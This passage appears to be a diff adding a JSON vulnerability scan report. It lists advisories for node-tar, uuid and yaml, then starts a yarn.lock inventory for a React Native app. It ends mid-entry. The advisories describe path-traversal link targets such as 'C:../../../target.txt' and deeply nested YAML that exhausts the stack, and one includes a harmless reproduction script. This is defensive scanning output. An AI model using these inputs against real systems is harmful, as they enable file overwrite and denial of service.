"https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:3821767ead7d2b75b45213a27ae5881d9d6235928be792f12b3e805f792318f3", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.8", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:2100b5ba0d977cbbf973bf6ff5bfcda6e8d40ef2a8e69fb1541d988fa5285b2d", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:56f9ebe65eab2a87dcc71bace2bd9a5ea6a5282cb03db5277275782af7f5edba", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:4a0e3e859f42776d29fe81073a391e617737405be6fb4dc8020cd06df3801f81", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2025-64118", + "VendorIDs": [ + "GHSA-29xp-372q-xqph" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64118", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f41538c7d2582b7c66b5e33451264bf0723862844949f6610b93db07601f83e2", + "Title": "node-tar: tar: node-tar: Information disclosure via reading a truncated tar file", + "Description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-362", + "CWE-367" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H", + "V40Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 4.7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64118", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d", + "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9", + "https://github.com/isaacs/node-tar/issues/445", + "https://github.com/isaacs/node-tar/pull/446", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64118", + "https://www.cve.org/CVERecord?id=CVE-2025-64118" + ], + "PublishedDate": "2025-10-30T18:15:33.673Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "GHSA-w5hq-g745-h8pq", + "PkgID": "uuid@3.4.0", + "PkgName": "uuid", + "PkgIdentifier": { + "PURL": "pkg:npm/uuid@3.4.0", + "UID": "7d9619cf1e452e6a" + }, + "InstalledVersion": "3.4.0", + "FixedVersion": "14.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:969a882abdcc7191be1f9fbcde7343201b1876bd8779029bc10ddf53a52b750f", + "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", + "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + } + }, + "References": [ + "https://github.com/uuidjs/uuid", + "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", + "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", + "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" + ], + "PublishedDate": "2026-04-22T20:53:24Z", + "LastModifiedDate": "2026-04-22T20:53:24Z" + }, + { + "VulnerabilityID": "GHSA-w5hq-g745-h8pq", + "PkgID": "uuid@7.0.3", + "PkgName": "uuid", + "PkgIdentifier": { + "PURL": "pkg:npm/uuid@7.0.3", + "UID": "4c942b206312fdd9" + }, + "InstalledVersion": "7.0.3", + "FixedVersion": "14.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a857bbe275cc5c71c0296d09be55e665868f3ee49f1bc33e0bb472b3108323a9", + "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", + "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,'NO_THROW'); }\n catch(e){ console.log(name,'THREW',e.name); }\n}\"\n```\n\nObserved:\n\n- `v4 THREW RangeError`\n- `v5 NO_THROW`\n- `v6 NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4`/`v1`/`v7`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3` and `v5`)\n- `src/v6.ts`", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.3 + } + }, + "References": [ + "https://github.com/uuidjs/uuid", + "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", + "https://github.com/uuidjs/uuid/releases/tag/v14.0.0", + "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq" + ], + "PublishedDate": "2026-04-22T20:53:24Z", + "LastModifiedDate": "2026-04-22T20:53:24Z" + }, + { + "VulnerabilityID": "CVE-2026-33532", + "VendorIDs": [ + "GHSA-48c2-rrv3-qjmp" + ], + "PkgID": "yaml@2.8.1", + "PkgName": "yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/yaml@2.8.1", + "UID": "37f4ea3e7440d092" + }, + "InstalledVersion": "2.8.1", + "FixedVersion": "2.8.3, 1.10.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33532", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:92f65e04ccde0fe3a0d60bcb79201e1fe0e19e8beba648986a76d544c99161ca", + "Title": "yaml: yaml: Denial of Service via deeply nested YAML document parsing", + "Description": "`yaml` is a YAML parser and serialiser for JavaScript. Parsing a YAML document with a version of `yaml` on the 1.x branch prior to 1.10.3 or on the 2.x branch prior to 2.8.3 may throw a RangeError due to a stack overflow. The node resolution/composition phase uses recursive function calls without a depth bound. An attacker who can supply YAML for parsing can trigger a `RangeError: Maximum call stack size exceeded` with a small payload (~2–10 KB). The `RangeError` is not a `YAMLParseError`, so applications that only catch YAML-specific errors will encounter an unexpected exception type. Depending on the host application's exception handling, this can fail requests or terminate the Node.js process. Flow sequences allow deep nesting with minimal bytes (2 bytes per level: one `[` and one `]`). On the default Node.js stack, approximately 1,000–5,000 levels of nesting (2–10 KB input) exhaust the call stack. The exact threshold is environment-dependent (Node.js version, stack size, call stack depth at invocation). Note: the library's `Parser` (CST phase) uses a stack-based iterative approach and is not affected. Only the compose/resolve phase uses actual call-stack recursion. All three public parsing APIs are affected: `YAML.parse()`, `YAML.parseDocument()`, and `YAML.parseAllDocuments()`. Versions 1.10.3 and 2.8.3 contain a patch.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33532", + "https://github.com/eemeli/yaml", + "https://github.com/eemeli/yaml/commit/1e84ebbea7ec35011a4c61bbb820a529ee4f359b", + "https://github.com/eemeli/yaml/releases/tag/v1.10.3", + "https://github.com/eemeli/yaml/releases/tag/v2.8.3", + "https://github.com/eemeli/yaml/security/advisories/GHSA-48c2-rrv3-qjmp", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33532", + "https://www.cve.org/CVERecord?id=CVE-2026-33532" + ], + "PublishedDate": "2026-03-26T20:16:15.543Z", + "LastModifiedDate": "2026-04-02T18:11:37.49Z" + } + ] + }, + { + "Target": "yarn.lock", + "Class": "lang-pkgs", + "Type": "yarn", + "Packages": [ + { + "ID": "Performics@0.0.1", + "Name": "Performics", + "Identifier": { + "PURL": "pkg:npm/performics@0.0.1", + "UID": "125b1b606e077594" + }, + "Version": "0.0.1", + "Relationship": "root", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/runtime@7.28.4", + "@dominicvonk/react-native-apk-installer@2.2.2", + "@mapbox/polyline@1.2.1", + "@react-native-async-storage/async-storage@1.24.0", + "@react-native-clipboard/clipboard@1.16.3", + "@react-native-community/checkbox@0.5.20", + "@react-native-community/datetimepicker@8.4.5", + "@react-native-community/masked-view@0.1.11", + "@react-native-community/netinfo@11.4.1", + "@react-native-community/slider@5.0.1", + "@react-native-firebase/app@23.4.0", + "@react-native-firebase/crashlytics@23.4.0", + "@react-native-firebase/messaging@23.4.0", + "@react-native-picker/picker@2.11.2", + "@react-native/new-app-screen@0.81.0", + "@react-navigation/drawer@7.5.9", + "@react-navigation/material-top-tabs@7.4.22", + "@react-navigation/native@7.2.1", + "@react-navigation/stack@7.4.9", + "axios@1.12.2", + "babel-plugin-inline-import@3.0.0", + "babel-plugin-module-resolver@5.0.3", + "base-64@1.0.0", + "deprecated-react-native-prop-types@5.0.0", + "install@0.13.0", + "mime@4.1.0", + "moment@2.30.1", + "npm@11.6.2", + "react-native-asset@2.1.1", + "react-native-audio-recorder-player@3.5.3", + "react-native-blob-util@0.22.2", + "react-native-bootsplash@6.3.11", + "react-native-camera-kit@15.1.0", + "react-native-chart-kit@6.12.0", + "react-native-collapsible@1.6.2", + "react-native-contacts@8.0.10", + "react-native-device-info@14.1.1", + "react-native-draggable-flatlist@4.0.3", + "react-native-exit-app@2.0.0", + "react-native-file-viewer@2.1.5", + "react-native-fs@2.20.0", + "react-native-geocoding@0.5.0", + "react-native-geolocation-service@5.3.1", + "react-native-gesture-handler@2.28.0", + "react-native-get-random-values@1.11.0", + "react-native-gif@1.0.3", + "react-native-google-maps@1.0.0", + "react-native-image-crop-picker@0.41.6", + "react-native-image-pan-zoom@2.1.12", + "react-native-image-picker@8.2.1", + "react-native-image-resizer@1.4.5", + "react-native-image-zoom-viewer@3.0.1", + "react-native-keyboard-aware-scroll-view@0.9.5", + "react-native-keychain@10.0.0", + "react-native-linear-gradient@2.8.3", + "react-native-localize@3.5.2", + "react-native-maps@1.26.14", + "react-native-markdown-display@7.0.2", + "react-native-mmkv@3.3.3", + "react-native-modal-datetime-picker@18.0.0", + "react-native-modal-selector@2.1.2", + "react-native-modal@14.0.0-rc.1", + "react-native-multiple-select@0.5.12", + "react-native-orientation-locker@1.7.0", + "react-native-otp-inputs@7.4.0", + "react-native-pager-view@8.0.0", + "react-native-paper@5.14.5", + "react-native-permissions@5.4.2", + "react-native-photo-manipulator@1.9.2", + "react-native-push-notification@8.1.1", + "react-native-quick-crypto@0.7.17", + "react-native-reanimated-carousel@4.0.3", + "react-native-reanimated@4.3.0", + "react-native-responsive-screen@1.4.2", + "react-native-safe-area-context@5.6.1", + "react-native-screens@4.16.0", + "react-native-send-intent@1.3.0", + "react-native-share@12.2.6", + "react-native-snackbar@2.9.0", + "react-native-snap-carousel@3.9.1", + "react-native-splash-screen@3.3.0", + "react-native-sqlite-2@3.6.2", + "react-native-svg-transformer@1.5.1", + "react-native-svg@15.14.0", + "react-native-tab-view@4.3.0", + "react-native-tts@4.1.1", + "react-native-vector-icons@10.3.0", + "react-native-video-controls@2.8.1", + "react-native-video@6.17.0", + "react-native-view-shot@4.0.3", + "react-native-vision-camera-v3-image-labeling@1.5.0", + "react-native-vision-camera@4.7.2", + "react-native-webview@13.16.0", + "react-native-worklets-core@1.6.3", + "react-native-worklets@0.8.1", + "react-native@0.81.0", + "react-redux@9.2.0", + "react@19.1.0", + "redux@5.0.1" + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@dominicvonk/react-native-apk-installer@2.2.2", + "Name": "@dominicvonk/react-native-apk-installer", + "Identifier": { + "PURL": "pkg:npm/%40dominicvonk/react-native-apk-installer@2.2.2", + "UID": "bda9ed012421af38" + }, + "Version": "2.2.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 1066, + "EndLine": 1069 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@mapbox/polyline@1.2.1", + "Name": "@mapbox/polyline", + "Identifier": { + "PURL": "pkg:npm/%40mapbox/polyline@1.2.1", + "UID": "c2e689f49011c88c" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Relationship": "direct", + "DependsOn": [ + "meow@9.0.0" + ], + "Locations": [ + { + "StartLine": 1896, + "EndLine": 1901 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-async-storage/async-storage@1.24.0", + "Name": "@react-native-async-storage/async-storage", + "Identifier": { + "PURL": "pkg:npm/%40react-native-async-storage/async-storage@1.24.0", + "UID": "d055713cb08dc8e1" + }, + "Version": "1.24.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "merge-options@3.0.4" + ], + "Locations": [ + { + "StartLine": 2154, + "EndLine": 2159 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-clipboard/clipboard@1.16.3", + "Name": "@react-native-clipboard/clipboard", + "Identifier": { + "PURL": "pkg:npm/%40react-native-clipboard/clipboard@1.16.3", + "UID": "882831bb7b4690cf" + }, + "Version": "1.16.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2161, + "EndLine": 2164 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/checkbox@0.5.20", + "Name": "@react-native-community/checkbox", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/checkbox@0.5.20", + "UID": "fa587a8c2fb6cd21" + }, + "Version": "0.5.20", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2166, + "EndLine": 2169 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/datetimepicker@8.4.5", + "Name": "@react-native-community/datetimepicker", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/datetimepicker@8.4.5", + "UID": "ccda55d8970f0fb5" + }, + "Version": "8.4.5", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "invariant@2.2.4" + ], + "Locations": [ + { + "StartLine": 2359, + "EndLine": 2364 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/masked-view@0.1.11", + "Name": "@react-native-community/masked-view", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/masked-view@0.1.11", + "UID": "d952686535c42a63" + }, + "Version": "0.1.11", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2366, + "EndLine": 2369 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/netinfo@11.4.1", + "Name": "@react-native-community/netinfo", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/netinfo@11.4.1", + "UID": "9bb130c16484b6ba" + }, + "Version": "11.4.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2371, + "EndLine": 2374 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/slider@5.0.1", + "Name": "@react-native-community/slider", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/slider@5.0.1", + "UID": "568fc74d152b4f0" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 2383, + "EndLine": 2386 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-firebase/app@23.4.0", + "Name": "@react-native-firebase/app", + "Identifier": { + "PURL": "pkg:npm/%40react-native-firebase/app@23.4.0", + "UID": "fe42eb733eeb4e6c" + }, + "Version": "23.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "firebase@12.2.1" + ], + "Locations": [ + { + "StartLine": 2388, + "EndLine": 2393 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-firebase/crashlytics@23.4.0", + "Name": 